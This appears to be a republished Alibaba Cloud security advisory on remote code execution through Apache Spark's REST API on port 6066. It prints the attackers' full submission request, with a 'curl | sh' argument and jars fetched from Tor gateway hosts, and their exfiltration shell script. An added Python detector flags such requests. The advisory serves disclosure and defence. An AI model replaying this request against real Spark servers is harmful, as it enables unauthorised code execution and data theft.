Alibaba Cloud Security Team Discovers Apache Spark Rest API Remote Code Execution (RCE) Exploit

Impact of the Exploit

Details of the Exploit

  1. In the first step, the attacker discovers a Spark server whose web UI service is exposed to the internet, using mass scanning.
  2. The attacker sends the following request to the Spark server's REST API on port 6066. The attack payload instructs the server to download SimpleApp.jar from a dark-web location via the onion.plus gateway for the subsequent stages, hiding the hosting behind .onion routing.

     POST /v1/submissions/create
     Host: x.x.x.x:6066

     {
       "action": "CreateSubmissionRequest",
       "clientSparkVersion": "2.1.0",
       "appArgs": [ "curl x.x.x.x/y.sh|sh" ],
       "appResource": "https://xxxx.onion.plus/SimpleApp.jar",
       "environmentVariables": { "SPARK_ENV_LOADED": "1" },
       "mainClass": "SimpleApp",
       "sparkProperties": {
         "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar",
         "spark.driver.supervise": "false",
         "spark.app.name": "SimpleApp",
         "spark.eventLog.enabled": "false",
         "spark.submit.deployMode": "cluster",
         "spark.master": "spark://x.x.x.x:6066"
       }
     }

     Please note that this is the first time that the Tor "dark web" has been used to spread this type of backdoor. According to security experts at Alibaba, this sort of approach will increase in the near future. In our estimation, about 5,000 Spark servers accessible on the web can potentially be exploited using this vulnerability.
  3. Reverse-engineering analysis shows that the jar package is a backdoor program that downloads a shell script through onion routing and then executes it. The content of the shell script is as follows:

     #!/bin/bash
     ps ax --sort=-pcpu > /tmp/tmp.txt
     curl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.php
     rm -rf /tmp/tmp.txt

  4. This script only gathers and transmits performance information about the victim machine, without taking any further action; it apparently gives the attackers on-the-ground intelligence for planning their next steps, taking the estimated computing power of the cluster into consideration.
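The request above carries three indicators a defender can key on when reviewing submissions reaching the REST port: an application jar pulled over HTTP(S) from a host outside the cluster, a hostname routed through a Tor gateway or hidden service, and an appArgs entry that downloads a script and pipes it into a shell. The following checker, added here as an example and not code from the original article, from Apache Spark or from Alibaba Cloud, applies those indicators to the JSON body of a submission request. The allowlisted hosts, the benign sample job and the indicator wording are constructed for the example; only the captured request body comes from the write-up (with its x.x.x.x and xxxx.onion.plus placeholders kept).

```python
import json
import re
from urllib.parse import urlparse

# Constructed allowlist for this example: the hosts from which your own
# deployment is expected to pull application jars.
TRUSTED_JAR_HOSTS = {"hdfs-nn.internal.example", "artifacts.internal.example"}

# "download something and pipe it into a shell" inside appArgs, as in the
# "curl x.x.x.x/y.sh|sh" argument from the captured request.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")


def jar_url_reasons(url):
    """Indicators for a single jar location (appResource or a spark.jars entry)."""
    reasons = []
    parsed = urlparse(url.strip())
    host = parsed.hostname or ""
    if parsed.scheme in ("http", "https") and host not in TRUSTED_JAR_HOSTS:
        reasons.append(f"jar fetched over {parsed.scheme} from untrusted host {host}")
    if host.endswith(".onion") or ".onion." in host:
        reasons.append(f"jar hosted via Tor hidden service or gateway {host}")
    return reasons


def analyze_submission(raw_json):
    """Return the list of indicators found in one REST submission body.

    An empty list means the submission matched none of the patterns.
    """
    sub = json.loads(raw_json)
    if sub.get("action") != "CreateSubmissionRequest":
        return []  # only this action launches a driver process on the cluster
    props = sub.get("sparkProperties", {})
    jar_urls = [sub.get("appResource", "")]
    jar_urls += props.get("spark.jars", "").split(",")
    reasons = []
    for url in jar_urls:
        if url.strip():
            reasons.extend(jar_url_reasons(url))
    for arg in sub.get("appArgs", []):
        if DOWNLOAD_EXEC_RE.search(arg):
            reasons.append(f"appArgs carries a download-and-execute pipeline: {arg!r}")
    return reasons


# Sample 1: the request body from the write-up, placeholders kept as published.
MALICIOUS_SUBMISSION = """{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.1.0",
  "appArgs": [ "curl x.x.x.x/y.sh|sh" ],
  "appResource": "https://xxxx.onion.plus/SimpleApp.jar",
  "environmentVariables": { "SPARK_ENV_LOADED": "1" },
  "mainClass": "SimpleApp",
  "sparkProperties": {
    "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "SimpleApp",
    "spark.eventLog.enabled": "false",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://x.x.x.x:6066"
  }
}"""

# Sample 2 (constructed): a routine job whose jar lives on the cluster's own HDFS.
BENIGN_SUBMISSION = """{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.1.0",
  "appArgs": ["--date", "2018-05-01"],
  "appResource": "hdfs://hdfs-nn.internal.example/apps/etl.jar",
  "environmentVariables": {"SPARK_ENV_LOADED": "1"},
  "mainClass": "com.example.Etl",
  "sparkProperties": {
    "spark.app.name": "nightly-etl",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://master.internal.example:6066"
  }
}"""


def triage(samples):
    """Map each sample name to its indicator list, ready for a log or alert pipeline."""
    return {name: analyze_submission(body) for name, body in samples.items()}


if __name__ == "__main__":
    results = triage({"captured": MALICIOUS_SUBMISSION, "nightly-etl": BENIGN_SUBMISSION})
    for name, reasons in results.items():
        print(f"{name}: {'SUSPICIOUS' if reasons else 'ok'}")
        for reason in reasons:
            print(f"  - {reason}")
```

The checker inspects both appResource and spark.jars, because the captured request names the remote jar in both places; a submission that is clean in one field and not the other is still flagged. Feed it the bodies logged by whatever sits in front of port 6066 (a reverse proxy, a WAF, or a packet capture), and treat any non-empty result as a trigger for review rather than as proof of compromise.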

Further Discussions

Suggestions for Remediation of Vulnerability

Further Reading

  1. Apache Spark Security Configuration: http://spark.apache.org/docs/latest/configuration.html#security
  2. Hadoop Yarn RCE Vulnerability: (Article in Chinese) https://www.toutiao.com/i6552678121449980423


Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website: https://www.alibabacloud.com
